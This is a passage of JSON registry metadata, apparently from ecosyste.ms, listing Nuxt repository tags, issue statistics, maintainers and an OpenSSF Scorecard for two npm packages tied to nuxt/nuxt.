ependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-05-11T01:23:04.062Z","dependent_packages_count":0,"downloads":9,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.40986178278009,"dependent_packages_count":53.76296178382521,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":45.58641178330265},"purl":"pkg:npm/%40axxy/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@axxy/nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@axxy/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@axxy/nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@axxy%2Fnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@axxy%2Fnuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@axxy%2Fnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@axxy%2Fnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@axxy%2Fnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@axxy%2Fnuxt/codemeta","maintainers":[{"uuid":"seezt","login":"seezt","name":null,"email":"seezt@vip.qq.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~seezt","role":null,"created_at":"2023-09-11T13:35:15.128Z","updated_at":"2023-09-11T13:35:15.128Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/seezt/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":10922071,"name":"@nuxt/rspack-builder-nightly","ecosystem":"npm","description":"rspack bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":2304,"first_release_published_at":"2024-09-24T15:07:53.131Z","latest_release_published_at":"2024-09-24T15:07:53.131Z","latest_release_number":"0.0.0","last_synced_at":"2026-05-11T01:23:35.843Z","created_at":"2024-09-24T15:10:10.060Z","updated_at":"2026-05-11T01:23:35.843Z","registry_url":"https://www.npmjs.com/package/@nuxt/rspack-builder-nightly","install_command":"npm install @nuxt/rspack-builder-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"5x":"5.0.0-29640169.76693a26","latest":"4.4.5-29640539.354d595c","3x":"3.21.5-29640925.9fc42f78"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-05-06T23:06:53.000Z","size":137282,"stargazers_count":60168,"open_issues_count":884,"forks_count":5596,"subscribers_count":775,"default_branch":"main","last_synced_at":"2026-05-07T02:02:57.794Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-05-07T00:28:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 